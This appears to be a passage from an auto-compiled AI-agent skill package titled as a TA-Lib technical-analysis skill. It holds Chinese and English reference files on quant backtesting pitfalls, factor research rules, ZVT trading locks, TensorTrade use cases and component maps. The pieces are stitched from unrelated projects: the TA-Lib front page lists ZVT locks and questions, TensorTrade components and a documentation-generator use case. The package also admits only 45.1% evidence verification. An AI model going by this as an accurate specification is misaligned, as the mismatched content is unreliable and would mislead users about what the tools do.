ZVT Trader 在 load_data 完成后检查数据为空时，不提前退出，而是将空 DataFrame 传入 selector 计算，触发后续 NoneType 操作链式崩溃。错误栈深且难以定位根因， 用户误以为是策略逻辑问题。根因是数据时间窗口配置错误（start/end 不在数据 库覆盖范围内）但无有效校验。

Source: https://github.com/zvtvz/zvt/issues/187

### `AP-ZVT-183B` — HFQ（后复权）与 QFQ（前复权）K 线表使用错误导致因子计算漂移 <sub>(high)</sub>

ZVT 提供 Stock1dKdata（不复权）、Stock1dHfqKdata（后复权）、Stock1dQfqKdata （前复权）三张独立表。用户在计算价格动量/均线因子时混用两张表（如用不复权 做均线，用后复权做收益率），导致除权日前后因子值产生跳变。ZVT 不做跨表 复权类型一致性校验，混用静默通过。

Source: https://github.com/zvtvz/zvt/issues/183

FILE:references/COMPONENTS.md
# Component Capability Map

**Project**: finance-bp-130--tensortrade
**Scan date**: 2026-04-22
**Stats**: {'total_files': 5, 'total_classes': 31, 'total_functions': 0, 'total_stages': 5}

## Modules (5)

- [data_collection_&_generation](components/data_collection_-_generation.md): 4 classes
- [feature_engineering_&_data_feed](components/feature_engineering_-_data_feed.md): 6 classes
- [order_management_system_(oms)](components/order_management_system_-oms.md): 8 classes
- [trading_environment](components/trading_environment.md): 8 classes
- [agent_training](components/agent_training.md): 5 classes

FILE:references/CONSTRAINTS.md
# Constraints

## preservation_manifest

```yaml
required_objects:
  business_decisions_count: 139
  fatal_constraints_count: 44
  non_fatal_constraints_count: 174
  use_cases_count: 19
  semantic_locks_count: 12
  preconditions_count: 4
  evidence_quality_rules_count: 2
  traceback_scenarios_count: 5

```

## Domain Constraints Injected (39)

- **`SHARED-BT-LAB-001`** <sub>(fatal)</sub>: 未来函数（Lookahead Bias）：在模拟历史时间点 t 的交易决策时， 不得使用 t 时刻之后才能知道的信息。最常见形式： (1) 使用收盘价计算信号并同日以收盘价成交； (2) 将 T 日收盘后计算的指标标记在同一根 K 线； (3) 使用当日最高/最低价作为成交假设。 信号计算与成交时间必须对齐：T 日收盘后计算信号，T+1 日开盘成交。
- **`SHARED-BT-LAB-002`** <sub>(high)</sub>: 指标预热期（Warmup Period）处理：滚动窗口指标在前 N 个 bar 时 NaN， 这些 bar 不应参与信号计算和持仓决策。强制要求指标的 warmup_period 与最长 lookback 期等长，且 warmup 期间持仓应置零。
- **`SHARED-BT-LAB-003`** <sub>(fatal)</sub>: ML/DL 模型时序数据划分必须按时间顺序：TRAIN < VALID < TEST， 不可使用随机 k-fold 分折（会将未来数据混入训练集）。 应使用 TimeSeriesSplit 或 Walk-Forward 验证。
- **`SHARED-BT-LAB-004`** <sub>(fatal)</sub>: 开盘价/最高价/最低价成交假设：日线回测中假设每日可以最高价卖出或 最低价买入（如动量策略"最高价止盈"），这是明显的 lookahead， 因为日内最高/最低价只有收盘后才能确认。成交价只能用开盘价或 前一日收盘价（带滑点）。
- **`SHARED-BT-LAB-005`** <sub>(high)</sub>: 数据对齐偏移（Off-by-one）：pandas rolling/shift 等操作容易引入细微的 1 期偏移错误。应在代码中明确记录每个序列的"观测时间点"， 并通过 assert 验证关键时间对齐关系。
- **`SHARED-BT-LAB-006`** <sub>(high)</sub>: 过度优化（Overfitting）：回测数量越多，过拟合概率越高。 Bailey et al.（2014）证明 Optimal Sharpe Ratio 期望值随回测次数单调递减。 应使用 Walk-Forward 验证代替 in-sample 参数穷举，并报告 Deflated Sharpe Ratio（DSR）而非峰值 Sharpe。
- **`SHARED-BT-SURV-001`** <sub>(fatal)</sub>: 幸存者偏差（Survivorship Bias）：使用当前市场成分股作为历史回测股票池， 会遗漏曾经存在但后来退市、摘牌或被合并的股票，系统性高估策略历史收益率。 回测股票池必须使用历史时点快照（point-in-time universe）。
- **`SHARED-BT-SURV-002`** <sub>(high)</sub>: In-Sample / Out-of-Sample 划分：策略开发、参数选择必须在样本内完成， 样本外数据仅用于最终验证，不可多次"看"样本外数据后继续调优 （会将样本外变为新的样本内，重蹈过拟合）。
- **`SHARED-BT-SURV-003`** <sub>(high)</sub>: 停牌/缺失数据的填充策略：停牌日价格不可简单用前一日收盘价 forward-fill， 因为这会在复盘时造成"零成交量"日参与了因子计算和信号生成。 应在因子计算层显式过滤缺失交易日，不填充。
- **`SHARED-BT-SURV-004`** <sub>(high)</sub>: 异常值（Extreme Value）污染：原始市场数据可能含有数据源错误（如除权未 及时调整、手工录入错误导致的极端价格），不清洗直接进入因子计算会产生 极端信号，污染整个横截面。应在 pipeline 入口处过滤 3-sigma 异常值。
- **`SHARED-BT-COST-001`** <sub>(fatal)</sub>: 交易成本（佣金 + 印花税/转让税 + 过户费）必须在回测初始化时强制配置， 不可使用零成本默认值。忽略成本的回测策略绩效指标具有欺骗性， 高换手率策略尤其严重（单边往返成本往往吞噬 50%+ 的毛收益）。
- **`SHARED-BT-COST-002`** <sub>(high)</sub>: 滑点（Slippage）建模：回测若无滑点，假设每笔订单以理想价格成交， 高频策略在实盘中会因成交价劣化而产生严重亏损。至少应配置固定点差 或比例滑点；大单应使用成交量比例模型（如不超过日成交量 5%）。
- **`SHARED-BT-COST-003`** <sub>(high)</sub>: 换手率（Turnover）必须在回测绩效报告中展示并与成本关联分析。 月换手率超过 50%（年化 600%+）时，策略净收益对成本假设极度敏感， 每 10bps 成本变化可能改变策略盈亏结论，必须做成本敏感性分析。
- **`SHARED-BT-COST-004`** <sub>(medium)</sub>: 仓位规模化（Position Sizing）必须纳入资金量约束：回测应模拟固定资金量 下的实际持仓股数（取整），而非假设可以持有小数股。 对小盘股，最小交易单位（A股：100股/手）会导致实际可持仓量与目标权重 产生偏差，应在回测中模拟取整效应。
- **`SHARED-BT-TIME-001`** <sub>(high)</sub>: 时间戳时区统一：多数据源合并时，UTC vs 本地时间混用是常见数据腐败源。 所有时间戳必须在 pipeline 入口处统一转换为同一时区（推荐 UTC 存储， 市场本地时区展示），不可在 pipeline 中途混用不同时区。
- **`SHARED-BT-TIME-002`** <sub>(high)</sub>: 交易日历对齐：合并不同市场或不同频率数据时（如日线价格 + 周频因子）， 必须使用明确的交易日历进行 reindex/merge，不可使用 outer join 后 fillna， 否则会在非交易日（节假日）创建虚假数据行。
- **`SHARED-BT-TIME-003`** <sub>(high)</sub>: 增量更新边界校验：历史数据增量更新时，必须从数据库查询已存最新日期， 仅下载该日期之后的数据。若重新下载已有数据并追加，会产生时间戳重复行， 导致回测时序错误。更新前后必须校验无重复 (index.duplicated().any() == False)。
- **`SHARED-BT-TIME-004`** <sub>(medium)</sub>: 回测绩效归因失真：基准（Benchmark）选择不当会使 Alpha/Beta 计算失真。 应选用策略实际可投资的被动基准（如 HS300 ETF），而非不可直接投资的 价格指数（如 HS300 指数）。价格指数不含股息再投资，会低估持仓基准收益。
- **`SHARED-BT-PERF-001`** <sub>(medium)</sub>: 最大回撤（Max Drawdown）计算必须使用净值序列（portfolio value）， 不可用累计收益率序列代替。若使用对数收益率累加，会低估回撤深度 （因对数收益率在下跌时会比简单收益率偏小）。
- **`SHARED-BT-PERF-002`** <sub>(medium)</sub>: Sharpe Ratio 年化化约定：年化 Sharpe = 日 Sharpe × sqrt(252)（股票，252 交易日） 或 × sqrt(365)（加密货币，365日）。不同系统默认不同，跨系统对比前必须 确认年化因子，否则 Sharpe 不可比。
- **`SHARED-BT-PERF-003`** <sub>(medium)</sub>: Calmar Ratio / Sortino Ratio 优于 Sharpe Ratio 作为风险调整收益指标： Sharpe 假设收益正态分布，A 股/加密市场的收益分布显著左偏（肥尾）， 会低估下行风险。量化评估应同时报告 Sortino（仅下行波动）和 Calmar（年化收益/最大回撤），不应单一依赖 Sharpe。
- **`SHARED-BT-PERF-004`** <sub>(medium)</sub>: 回测绩效归因应拆解为：alpha（主动收益）、beta（市场收益）、 因子暴露收益（style/sector）和特异性收益（stock selection）。 不做归因的回测无法区分"策略优秀"与"顺风行情恰好 beta 对了"。
- **`SHARED-FR-IC-001`** <sub>(high)</sub>: IC（信息系数）是衡量因子预测能力的核心指标，定义为因子值与 下期收益率的 Spearman 秩相关系数（ICIR = IC / std(IC)）。 IC 绝对值 > 0.05 视为有预测能力的初步证据，ICIR > 0.5 视为稳定。 不计算 IC 直接报告回测绩效是因子有效性证明缺失的典型问题。
- **`SHARED-FR-IC-002`** <sub>(high)</sub>: IC 衰减（IC Decay）分析：因子预测能力通常随持仓期增长而衰减。 应计算 1/5/10/20 日 IC 序列，识别因子的最优持仓期。 IC 在1日高但20日迅速衰减的因子是短期因子，不适合月度换仓策略； 反之亦然。使用错误的持仓期会严重损害因子实盘表现。
- **`SHARED-FR-IC-003`** <sub>(high)</sub>: Harvey, Liu & Zhu (2016) 警告：学术界已发现 300+ 个"显著"因子， 其中大量是多重检验下的误发现（False Discovery）。因子有效性要求： t-stat > 3.0（而非传统的 1.96）；或在不同时段/市场独立复现； 或有清晰的经济学逻辑。不满足上述条件的因子极可能是数据挖掘产物。
- **`SHARED-FR-IC-004`** <sub>(high)</sub>: 因子换手率（Factor Turnover）控制：高 IC 但高换手率的因子，在扣除 交易成本后净 IC 可能为负。应计算换手率调整后的有效 IC： net_IC = IC - turnover × cost_per_turn。目标换手率 ≤ 50%（月频）。
- **`SHARED-FR-IC-005`** <sub>(medium)</sub>: 因子衰减期（Half-life）是因子信号强度的核心参数，直接决定最优再平衡频率。 半衰期 < 5 日：日频或周频换仓；5-20 日：周频或双周；> 20 日：月频换仓。 错误地对短期因子使用月频换仓，会导致大量 alpha 在持仓期内消散。
- **`SHARED-FR-NEUT-001`** <sub>(high)</sub>: 行业中性化（Industry Neutralization）：因子值若不对行业均值中性化， 因子收益中会混入行业轮动收益，难以判断是因子本身还是行业暴露驱动了收益。 行业中性化操作：factor_neutral = factor - industry_mean(factor)。
- **`SHARED-FR-NEUT-002`** <sub>(high)</sub>: 市值中性化（Market Cap Neutralization）：小盘股效应（小盘跑赢大盘） 是金融史上最持久的 anomaly 之一，会污染几乎所有未中性化的因子。 若因子与市值高度相关，选股会系统性偏向小盘，收益来自市值暴露而非因子本身。 需同时进行行业和市值中性化（Fama-MacBeth 回归或残差法）。
- **`SHARED-FR-NEUT-003`** <sub>(high)</sub>: 异常值处理（Winsorize/MAD）：因子原始值通常含有极端值，极端值会扭曲 分组分析（如 Q1/Q10 十分位）。应对原始因子值做 Winsorize（截尾至 [1%, 99%] 或 3-sigma）或 MAD（中位数绝对偏差）缩尾，然后再排名/中性化。
- **`SHARED-FR-NEUT-004`** <sub>(medium)</sub>: 因子正交化（Factor Orthogonalization）：当多个因子共同用于合成打分时， 高相关因子的合成等效于对单一因子过度权重，稀释信号多样性。 应在合成前对因子做施密特正交化或 PCA，消除因子间的多重共线性。
- **`SHARED-FR-NEUT-005`** <sub>(medium)</sub>: 缺失数据填充策略：因子计算中的 NaN（停牌/新股/数据缺口）若用截面均值填充 会引入 lookahead bias（均值本身含未来信息）；若完全删除会产生幸存者偏差； 正确做法是用截面中位数（当日所有股票的中位数，不依赖未来）或将该股当日排除。
- **`SHARED-FR-PORT-001`** <sub>(high)</sub>: 分层分析（Quantile Analysis）：因子评估应使用 Q1/Q5（五分位）或 Q1/Q10（十分位）分组的多空收益差（top minus bottom spread）作为 主要评估指标，而非简单的多头收益。Q1 多 Q5 空的"单调性"检验是 因子有效性的核心证据：单调递增/递减 > 非单调 >> 仅多头有效。
- **`SHARED-FR-PORT-002`** <sub>(medium)</sub>: Alpha 衰减测试（Alpha Decay Test）：因子的月度 IC 在不同时段（牛市/熊市/ 震荡市）的稳定性是因子鲁棒性的重要证据。IC 仅在某个特定市场状态下有效 的因子不适合全天候部署；应分段（rolling 12M）展示 IC 时序， 识别因子失效期。
- **`SHARED-FR-PORT-003`** <sub>(medium)</sub>: 换仓成本感知（Turnover-Aware Selection）：因子排名靠近中间地带（49-51 分位） 的股票，排名小幅波动就会触发换仓，产生大量无效交易成本。 应在选股时设置换仓缓冲区（buffer zone）：只在排名变化超过阈值时才换仓。
- **`SHARED-FR-PORT-004`** <sub>(medium)</sub>: 分组收益的统计显著性（Bootstrap 检验）：因子分层收益差（Q1-Q5 spread） 即使在历史数据上很大，也可能是偶然，需要 bootstrap 或 t-test 检验 显著性（p-value < 0.05）。小样本回测期（< 3年）的分层收益尤其不可靠。
- **`SHARED-FR-XFER-001`** <sub>(high)</sub>: 因子跨市场可移植性验证：在一个市场有效的因子，不必然在另一个市场有效。 将美股因子直接套用 A 股、或将股票因子套用期货/加密货币，需要独立 IC 验证， 不可假设跨市场通用性。A 股特有异象（如反转效应、ST 价格异常）不存在于美股。
- **`SHARED-FR-XFER-002`** <sub>(medium)</sub>: 因子有效性时间稳定性：曾经有效的因子会因市场学习和套利行为逐渐失效 （McLean & Pontiff 2016 证明因子发表后平均衰减 58%）。 应定期（每季度/年）重新评估因子 IC，失效因子应及时替换或降权。
- **`SHARED-FR-XFER-003`** <sub>(medium)</sub>: 因子与宏观经济环境的交互：利率周期/经济周期/市场情绪对因子有效性影响显著。 价值因子（低 P/B）在利率上升期更有效；动量因子在趋势市更有效，震荡市失效。 部署因子前应评估当前宏观环境与因子最优生存环境的匹配度。

FILE:references/LOCKS.md
# Semantic Locks + Preconditions

## Semantic Locks (12)

### `SL-01` <sub>(on_violation: fatal)</sub>
Execute sell orders before buy orders in every trading cycle

### `SL-02` <sub>(on_violation: fatal)</sub>
Trading signals MUST use next-bar execution (no look-ahead)

### `SL-03` <sub>(on_violation: fatal)</sub>
Entity IDs MUST follow format entity_type_exchange_code

### `SL-04` <sub>(on_violation: fatal)</sub>
DataFrame index MUST be MultiIndex (entity_id, timestamp)

### `SL-05` <sub>(on_violation: fatal)</sub>
TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount

### `SL-06` <sub>(on_violation: fatal)</sub>
filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION

### `SL-07` <sub>(on_violation: fatal)</sub>
Transformer MUST run BEFORE Accumulator in factor pipeline

### `SL-08` <sub>(on_violation: fatal)</sub>
MACD parameters locked: fast=12, slow=26, signal=9

### `SL-09` <sub>(on_violation: warning)</sub>
Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001

### `SL-10` <sub>(on_violation: fatal)</sub>
A-share equity trading is T+1 (no same-day close of buy positions)

### `SL-11` <sub>(on_violation: fatal)</sub>
Recorder subclass MUST define provider AND data_schema class attributes

### `SL-12` <sub>(on_violation: fatal)</sub>
Factor result_df MUST contain either 'filter_result' OR 'score_result' column

## Preconditions (4)

- **`PC-01`**: `python3 -c 'import zvt; print(zvt.__version__)'` → on_fail: Run: python3 -m pip install zvt then re-run: python3 -m zvt.init_dirs to initialize data directories
- **`PC-02`**: `python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1); assert df is not None and len(df) > 0, 'No kdata found'"` → on_fail: Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000 (replace with your target entity IDs)
- **`PC-03`**: `python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); assert zvt_home.exists(), f'ZVT home not found: {zvt_home}'"` → on_fail: Run: python3 -m zvt.init_dirs
- **`PC-04`**: `python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"` → on_fail: Check directory permissions: chmod u+w ~/.zvt or set ZVT_HOME environment variable to a writable location

FILE:references/USE_CASES.md
# Known Use Cases (KUC)

Total: **19**

## `KUC-101`
**Source**: `docs/source/conf.py`

Infrastructure configuration for building TensorTrade documentation using Sphinx. Not a trading or ML use case.

## `KUC-102`
**Source**: `examples/ledger_example.ipynb`

Demonstrates how to set up a portfolio with wallets across multiple exchanges (Bitfinex, Bitstamp) and different trading pairs for simulated trading.

## `KUC-103`
**Source**: `examples/renderers_and_plotly_chart.ipynb`

Visualizes historical price data with technical analysis indicators on interactive Plotly charts for trading analysis and reporting.

## `KUC-104`
**Source**: `examples/setup_environment_tutorial.ipynb`

Tutorial demonstrating how to set up TensorTrade environment including data feeds, exchanges, and wallets for cryptocurrency trading research.

## `KUC-105`
**Source**: `examples/train_and_evaluate.ipynb`

End-to-end workflow for training reinforcement learning agents to trade cryptocurrency and evaluating their performance on test data.

## `KUC-106`
**Source**: `examples/training/run_ray_simulation.py`

Runs Ray RLlib PPO training simulations for cryptocurrency trading using custom RSI and MACD indicators as features.

## `KUC-107`
**Source**: `examples/training/train_advanced.py`

Trains trading agents using AdvancedPBR reward combining position-based returns, trading penalties, and hold bonuses to generate actual profits.

## `KUC-108`
**Source**: `examples/training/train_best.py`

Uses the best-performing configuration combining PBR reward and Optuna-optimized hyperparameters with zero commission for maximum agent skill isolation.

## `KUC-109`
**Source**: `examples/training/train_historical.py`

Trains RL agents on each available historical BTC data with technical indicators, then evaluates on recent market prices to assess generalization.

## `KUC-110`
**Source**: `examples/training/train_optuna.py`

Runs hyperparameter optimization trials using Optuna + Ray RLlib to find the best trading agent configuration based on validation performance.

## `KUC-111`
**Source**: `examples/training/train_profit.py`

Profit-focused strategy that trains on bear market data with simple trend-following features and risk-adjusted returns (Sharpe ratio) optimization.

## `KUC-112`
**Source**: `examples/training/train_ray_long.py`

Long-running (5-10 min) Ray RLlib training with custom callbacks that track wallet/portfolio net worth at episode boundaries for performance monitoring.

## `KUC-113`
**Source**: `examples/training/train_robust.py`

Robust training approach using normalized/scale-invariant features, higher exploration entropy, early stopping, noise injection, and simpler networks to prevent overfitting.

## `KUC-114`
**Source**: `examples/training/train_simple.py`

Simple demonstration showing how to train a trading agent with actual wallet balances and trade execution visibility for educational purposes.

## `KUC-115`
**Source**: `examples/training/train_trend.py`

Simple trend-following strategy using only 5 trend indicators and a tiny (32x32) neural network to learn basic market entry/exit signals, avoiding complex overfitting.

## `KUC-116`
**Source**: `examples/training/train_walkforward.py`

Walk-forward training that uses rolling windows across multiple market regimes (bull, bear, sideways) with incremental learning and checkpointing for robust strategy development.

## `KUC-117`
**Source**: `examples/use_attentionnet_rllib.ipynb`

Uses attention mechanisms in LSTM networks for RLlib-based cryptocurrency trading, allowing the model to focus on relevant historical price patterns.

## `KUC-118`
**Source**: `examples/use_lstm_rllib.ipynb`

LSTM recurrent neural network for cryptocurrency trading using custom RSI and MACD technical indicators as features with Ray RLlib.

## `KUC-119`
**Source**: `examples/use_stochastic_data.ipynb`

Generates synthetic financial data using stochastic processes (GBM, Heston, FBM, Cox) for testing trading strategies without requiring real market data.

FILE:references/WISDOM.md
# Cross-Project Wisdom

Total: **10**

## `CW-BT-001` — Cerebro 统一编排引擎
**From**: backtrader · **Applicable to**: backtesting

backtrader 用 Cerebro 作为单一入口，统一管理 data feeds、strategies、analyzers、 observers 的生命周期，支持一次 cerebro.run() 跑多策略+多数据源。 zvt 的 StockTrader 目前每次实例化只绑定一套因子，缺乏统一的多策略组合编排层； 借鉴 Cerebro 模式可让用户把多个 Trader 实例组合到一个 runner 中对比评估。

## `CW-BT-002` — Analyzer 插件化绩效评估
**From**: backtrader · **Applicable to**: backtesting

backtrader 提供 SharpeRatio、DrawDown、TimeReturn、TradeAnalyzer 等即插即用 的 Analyzer，可在不修改策略代码的情况下附加任意绩效指标。 zvt 当前绩效评估能力较弱，没有标准化的 Analyzer 接口； 借鉴此模式可让用户 cerebro.addanalyzer(SharpeRatio) 即得风险调整收益报告。

## `CW-BT-003` — Sizer 仓位管理分离
**From**: backtrader · **Applicable to**: backtesting

backtrader 将仓位管理（每次开仓买多少股/多大比例）单独抽象为 Sizer， 与信号逻辑完全解耦；内置 FixedSize、PercentSizer 等，用户可自定义。 zvt 目前没有显式的 Sizer 概念，仓位控制逻辑散落在 Trader.on_profit_control 等钩子中； 引入 Sizer 接口可使策略信号与资金管理规则独立演化和组合复用。

## `CW-BT-004` — Order 类型全集（Limit/Stop/OCO/Bracket）
**From**: backtrader · **Applicable to**: backtesting

backtrader 支持 Market、Limit、Stop、StopLimit、OCO（二选一）、 Bracket（止盈止损一对订单）等丰富订单类型，并模拟成交滑点和手续费方案。 zvt 回测目前主要支持市价成交，缺乏限价委托和组合订单模拟； 对于高频或实盘对接场景，完善订单类型将大幅提升回测真实性。

## `CW-BT-005` — 数据重采样与重播（Resampling & Replaying）
**From**: backtrader · **Applicable to**: backtesting

backtrader 可将低级别数据（如 1 min）实时 resample 为高级别（如 1 day）并同步驱动策略， 或 replay 逐 tick 模拟 OHLC 形成过程，实现日内精细回测。 zvt 目前多时间框架通过预录入不同级别 K 线实现，缺少运行时动态重采样； 借鉴此模式可在不重复录入数据的前提下支持任意时间粒度组合回测。

## `CW-VN-003` — CTA 回测引擎内置可视化
**From**: vnpy · **Applicable to**: backtesting

vnpy 的 cta_backtester 提供图形界面直接展示策略净值曲线、最大回撤、 每日盈亏、成交明细，无需 Jupyter Notebook。 zvt 目前回测结果可视化依赖 draw_result 方法调用 Plotly，但无统一的回测报告页面； 借鉴此模式可打包一个开箱即用的策略绩效仪表盘。

## `CW-VN-004` — vnpy.alpha ML 因子研究实验室（Lab）
**From**: vnpy · **Applicable to**: factor-research

vnpy 4.0 的 vnpy.alpha.lab 提供数据管理、模型训练、信号生成、策略回测一体化工作流， 支持 Lasso/LightGBM/MLP 等算法的标准化训练接口和可视化对比。 zvt 的 ML 能力目前仅有 MaStockMLMachine 一个入口，缺乏规范化 Lab 框架； 借鉴 Lab 模式可建立"特征工程→训练→信号→回测"的标准流水线，降低 ML 实验门槛。

## `CW-QL-001` — Point-in-Time 数据库（防未来数据泄漏）
**From**: qlib · **Applicable to**: backtesting

qlib 的 Point-in-Time Provider 保证在给定时间点 t 的查询只返回 t 时刻 真实可知的数据（财报发布延迟、修订历史均被正确处理）， 彻底消除回测中的 look-ahead bias。 zvt 目前财务数据以报告期为 timestamp，缺少"发布日"维度， 存在用未来财报数据做选股的潜在偏差；引入 PIT 模式可大幅提升回测可信度。

## `CW-QL-002` — Recorder + Experiment 实验管理（MLflow 风格）
**From**: qlib · **Applicable to**: factor-research

qlib 的 workflow 模块提供 Experiment/Recorder，自动记录每次模型训练的 超参数、特征、指标、预测结果，支持跨实验比较和模型版本管理。 zvt 目前缺乏 ML 实验追踪机制，每次重跑结果会覆盖前次； 借鉴 Recorder 模式可将每次因子实验的参数和结果持久化，支持快速复现和版本对比。

## `CW-QL-003` — Nested Decision Framework（多层嵌套决策执行）
**From**: qlib · **Applicable to**: backtesting

qlib 支持将高频执行层（分钟级委托拆单）嵌套在低频决策层（日级组合调仓）中， 两层独立优化且可组合运行，实现日内最优执行算法（如 TWAP、VWAP 调仓）。 zvt 目前回测仅有日线级别的成交假设，缺乏执行算法建模； 借鉴嵌套框架可让 zvt 区分"何时持有哪些股"与"如何以最小冲击成本建仓"两个问题。

FILE:references/components/agent_training.md
# agent_training (5 classes)

## `Agent.train`
`agent_training/agent-train.py:0`

## `Agent.restore`
`agent_training/agent-restore.py:0`

## `DQNAgent.run`
`agent_training/dqnagent-run.py:0`

## `ReplayMemory.append`
`agent_training/replaymemory-append.py:0`

## `Agent implementation`
`agent_training/agent-implementation.py:0`

FILE:references/components/data_collection_-_generation.md
# data_collection_&_generation (4 classes)

## `CryptoDataDownload.fetch`
`data_collection_&_generation/cryptodatadownload-fetch.py:0`

## `gbm.generate`
`data_collection_&_generation/gbm-generate.py:0`

## `ModelParameters.default`
`data_collection_&_generation/modelparameters-default.py:0`

## `Data source`
`data_collection_&_generation/data-source.py:0`

FILE:references/components/feature_engineering_-_data_feed.md
# feature_engineering_&_data_feed (6 classes)

## `Stream.source`
`feature_engineering_&_data_feed/stream-source.py:0`

## `DataFeed.next`
`feature_engineering_&_data_feed/datafeed-next.py:0`

## `Sensor.observe`
`feature_engineering_&_data_feed/sensor-observe.py:0`

## `Placeholder.set`
`feature_engineering_&_data_feed/placeholder-set.py:0`

## `Feed type`
`feature_engineering_&_data_feed/feed-type.py:0`

## `Stream operations`
`feature_engineering_&_data_feed/stream-operations.py:0`

FILE:references/components/order_management_system_-oms.md
# order_management_system_(oms) (8 classes)

## `Wallet.lock`
`order_management_system_(oms)/wallet-lock.py:0`

## `Wallet.transfer`
`order_management_system_(oms)/wallet-transfer.py:0`

## `Portfolio.net_worth`
`order_management_system_(oms)/portfolio-net-worth.py:0`

## `Exchange.execute_order`
`order_management_system_(oms)/exchange-execute-order.py:0`

## `Broker.submit`
`order_management_system_(oms)/broker-submit.py:0`

## `Criteria.evaluate`
`order_management_system_(oms)/criteria-evaluate.py:0`

## `Execution service`
`order_management_system_(oms)/execution-service.py:0`

## `Slippage model`
`order_management_system_(oms)/slippage-model.py:0`

FILE:references/components/trading_environment.md
# trading_environment (8 classes)

## `TradingEnv.step`
`trading_environment/tradingenv-step.py:0`

## `TradingEnv.reset`
`trading_environment/tradingenv-reset.py:0`

## `TensorTradeObserver.get`
`trading_environment/tensortradeobserver-get.py:0`

## `TensorTradeRewardScheme.get`
`trading_environment/tensortraderewardscheme-get.py:0`

## `TensorTradeActionScheme.perform`
`trading_environment/tensortradeactionscheme-perform.py:0`

## `Action scheme`
`trading_environment/action-scheme.py:0`

## `Reward scheme`
`trading_environment/reward-scheme.py:0`

## `Observer`
`trading_environment/observer.py:0`

ClawHub Data Analysis Research+2

T@clawhub-tangweigang-jpg-8679fec286

Talib Technical Analysis

Skill

通过 Python 调用 150+ TA-Lib 技术分析指标（均线、MACD、RSI、布林带等），支持多市场金融数据的技术面量化计算。

---
name: talib-technical-analysis
description: |-
  通过 Python 调用 150+ TA-Lib 技术分析指标（均线、MACD、RSI、布林带等），支持多市场金融数据的技术面量化计算。
license: Proprietary. See LICENSE.txt in project root.
compatibility: Designed for Doramagic-host ecosystem (Claude Code / openclaw / Cursor). Requires Python 3.12+ with uv package manager.
metadata:
  version: "v6.1"
  blueprint_id: "finance-bp-109"
  compiled_at: "2026-04-22T13:00:52.305302+00:00"
  capability_markets: "multi-market"
  capability_activities: "technical-analysis"
  sop_version: "crystal-compilation-v6.1"
---
# TA-Lib 技术分析 (talib-technical-analysis)

> 通过 Python 调用 150+ TA-Lib 技术分析指标（均线、MACD、RSI、布林带等），支持多市场金融数据的技术面量化计算。

## Pipeline

`data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization`

## Top Use Cases (1 total)

### TA-Lib Documentation HTML Generator (`UC-101`)
Converts TA-Lib markdown documentation into styled HTML pages for web publishing, and generates Pygments syntax highlighting CSS for code examples in
**Triggers**: documentation generation, html pages, pygments stylesheet

**Execute trigger**: `When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)`

## What I'll Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Semantic Locks (Fatal)

| ID | Rule | On Violation |
|---|---|---|
| `SL-01` | Execute sell orders before buy orders in every trading cycle | halt |
| `SL-02` | Trading signals MUST use next-bar execution (no look-ahead) | halt |
| `SL-03` | Entity IDs MUST follow format entity_type_exchange_code | halt |
| `SL-04` | DataFrame index MUST be MultiIndex (entity_id, timestamp) | halt |
| `SL-05` | TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount | halt |
| `SL-06` | filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION | halt |
| `SL-07` | Transformer MUST run BEFORE Accumulator in factor pipeline | halt |
| `SL-08` | MACD parameters locked: fast=12, slow=26, signal=9 | halt |

Full lock definitions: [references/LOCKS.md](references/LOCKS.md)

## Top Anti-Patterns (15 total)

- **`AP-TECHNICAL-ANALYSIS-001`**: C FFI Type Mismatch with Non-float64 Arrays
- **`AP-TECHNICAL-ANALYSIS-002`**: Multidimensional Array Memory Access Violations
- **`AP-TECHNICAL-ANALYSIS-003`**: Ignoring TA_RetCode Error Status from C Calls

All 15 anti-patterns: [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md)

## Evidence Quality Notice

> [QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-109. Evidence verify ratio = 45.1% and audit fail total = 35. Generated results may have uncaptured requirement gaps. Verify critical decisions against source files (LATEST.yaml / LATEST.jsonl).

## Reference Files

| File | Contents | When to Load |
|---|---|---|
| [references/seed.yaml](references/seed.yaml) | V6+ 全量权威 (source-of-truth) | 有行为/决策争议时必读 |
| [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md) | 15 条跨项目反模式 | 开始实现前 |
| [references/WISDOM.md](references/WISDOM.md) | 跨项目精华借鉴 | 架构决策时 |
| [references/CONSTRAINTS.md](references/CONSTRAINTS.md) | domain + fatal 约束 | 规则冲突时 |
| [references/USE_CASES.md](references/USE_CASES.md) | 全量 KUC-* 业务场景 | 需要完整示例时 |
| [references/LOCKS.md](references/LOCKS.md) | SL-* + preconditions + hints | 生成回测/交易代码前 |
| [references/COMPONENTS.md](references/COMPONENTS.md) | AST 组件地图（按 module 拆分）| 查 API 时 |

---

*Compiled by Doramagic crystal-compilation-v6.1 from `finance-bp-109` blueprint at 2026-04-22T13:00:52.305302+00:00.*
*See [human_summary.md](human_summary.md) for non-technical overview.*

FILE:human_summary.md
# Human Summary

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

